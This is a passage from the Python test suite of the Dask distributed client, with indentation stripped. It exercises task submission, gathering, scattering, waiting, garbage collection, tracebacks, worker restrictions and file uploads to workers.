wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = yield x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
result = yield x
x = c.submit(div, 10, 2) # continues to operate
result = yield x
assert result == 10 / 2
@gen_cluster()
def test_gc(s, a, b):
c = yield Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
yield x
assert s.tasks[x.key].who_has
x.__del__()
yield async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
yield c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(gen.TimeoutError):
x.result(timeout=0.01)
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = yield c.gather(x)
assert result == 11
result = yield c.gather([x])
assert result == [11]
result = yield c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
def test_gather_lost(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
yield a.close()
with pytest.raises(Exception):
res = yield c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
yield c.gather([x, y])
[xx] = yield c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = yield c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
results = yield futures
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = yield future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = yield futures
assert result == [2]
result = yield c.get({}, [], sync=False)
assert result == []
result = yield c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
yield c.gather(future_f)
with pytest.raises(AttributeError):
yield c.gather(future_g)
yield a.close()
@gen_cluster(client=True)
def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = yield wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = yield wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(gen.TimeoutError):
yield wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(gen.TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
yield gen.moment
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
yield gen.moment
result = yield z
assert result == 3
ykey = y.key
y.__del__()
yield gen.moment
assert ykey not in c.futures
@gen_cluster(client=True)
def test_garbage_collection_with_scatter(c, s, a, b):
[future] = yield c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
yield gen.moment
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
yield gen.sleep(0.1)
@gen_cluster(timeout=1000, client=True)
def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = yield x
xkey = x.key
del x
import gc
gc.collect()
yield gen.moment
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
yield gen.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = yield x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
yield x
@pytest.mark.skip
@gen_cluster(client=True)
def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
yield gen.moment
w = c.submit(add, y, z)
result = yield w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
yield wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
yield gen.moment
w.release_key(f.key)
xx, yy, zz = yield c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
yield gen.moment
worker.release_key(datum.key)
result = yield c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
yield wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
yield wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
yield wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
L = c.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}])
yield wait(L)
assert s.host_restrictions[L[0].key] == {a.ip}
assert s.host_restrictions[L[1].key] == {a.ip, b.ip}
assert s.host_restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
c.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
restrictions = {"y": {a.ip}, "z": {b.ip}}
futures = c.get(dsk, ["y", "z"], restrictions, sync=False)
result = yield futures
assert result == [2, 3]
assert "y" in a.data
assert "z" in b.data
@gen_cluster(client=True)
def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
yield z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
yield wait(L)
yield b.close()
assert b.address not in s.workers
result = yield c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
yield gen.sleep(0.01)
result = yield c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = yield x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = yield x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = yield z
assert result
@gen_cluster(client=True)
def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = yield c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = yield c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = yield c.gather(L)
assert all(result)
@gen_cluster()
def test_two_consecutive_clients_share_results(s, a, b):
c = yield Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = yield x
f = yield Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = yield y
assert xx == yy
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = yield c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = yield c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = yield c.get(dsk, keys, sync=False)
assert list(result) == list(dask.get(dsk, keys))
yield gen.moment
@gen_cluster(client=True)
def test__scatter(c, s, a, b):
d = yield c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = yield c.gather([d["y"]])
assert yy == [20]
[x] = yield c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = yield c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = yield z
assert result == 10 + 20
result = yield c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
def test__scatter_types(c, s, a, b):
d = yield c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = yield c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = yield c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
def test__scatter_non_list(c, s, a, b):
x = yield c.scatter(1)
assert isinstance(x, Future)
result = yield x
assert result == 1
@gen_cluster(client=True)
def test_scatter_hash(c, s, a, b):
[a] = yield c.scatter([1])
[b] = yield c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj(object):
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = yield c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = yield c.scatter(x)
result = yield future
assert str(result) == str(x)
@gen_cluster(client=True)
def test_scatter_typename(c, s, a, b):
future = yield c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
def test_scatter_hash(c, s, a, b):
x = yield c.scatter(123)
y = yield c.scatter(123)
assert x.key == y.key
z = yield c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
def test_get_releases_data(c, s, a, b):
[x] = yield c.get({"x": (inc, 1)}, ["x"], sync=False)
import gc
gc.collect()
start = time()
while c.refcount["x"]:
yield gen.sleep(0.01)
assert time() < start + 2
def test_Current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
yield y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
yield z
@gen_cluster(client=True)
def test_get_nbytes(c, s, a, b):
[x] = yield c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
yield y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
yield c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
yield z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
yield f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(client=True)
def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
s.task_duration["f"] = 0.001
results = c.map(f, lists, [total] * 10)
yield wait([total])
yield wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = yield c.get(dsk, ("x", 0), sync=False)
y = yield c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
yield c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
def test_directed_scatter(c, s, a, b):
yield c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
yield c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
def test_scatter_direct(c, s, a, b):
future = yield c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = yield future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = yield future
assert not s.counters["op"].components[0]["gather"]
result = yield c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = yield c.scatter(x, direct=True)
result = yield future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
def test_scatter_direct_broadcast(c, s, a, b):
future2 = yield c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = yield future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_scatter_direct_balanced(c, s, *workers):
futures = yield c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_scatter_direct_broadcast_target(c, s, *workers):
futures = yield c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = yield c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, gen.TimeoutError)):
yield c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = yield c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
def test_gather_direct(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
data = yield c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
yield wait(L)
assert a.data and b.data
@gen_cluster(client=True)
def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = yield x.traceback()
if sys.version_info[0] >= 3:
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
def test_get_traceback(c, s, a, b):
try:
yield c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
yield c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
if sys.version_info[0] >= 3:
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
yield c.upload_file(fn)
x = c.submit(g, pure=False)
result = yield x
assert result == value
@gen_cluster(client=True)
def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
yield c.upload_file(fn)
@gen_cluster(client=True)
def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
yield c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = yield x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
def test_upload_file_egg(c, s, a, b):
def g():
import package_1, package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
yield c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = yield x
assert result == (value, value)
@gen_cluster(client=True)
def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
yield c._upload_large_file(fn, remote_filename="x")
yield c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
yield c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@pytest.mark.skip
@gen_cluster()
def test_multiple_clients(s, a, b):
a = yield Client(s.address, asynchronous=True)
b = yield Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = yield x
yy = yield y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = yield z
assert zz == 5
yield a.close()
yield b.close()
@gen_cluster(client=True)
def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = yield c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
def test_async_compute_with_scatter(c, s, a, b):
d = yield c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = yield c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
def test_remote_scatter_gather(c, s, a, b):
x, y, z = yield c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = yield c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = yield y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = yield x
assert result == 1 + 1
result = yield z
assert result == 1 + 1 + 1 + 2
A, B, C = yield c.scatter([1, 2, 3])
AA, BB, xx = yield c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = yield c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
yield x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
yield x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
yield wait(L)
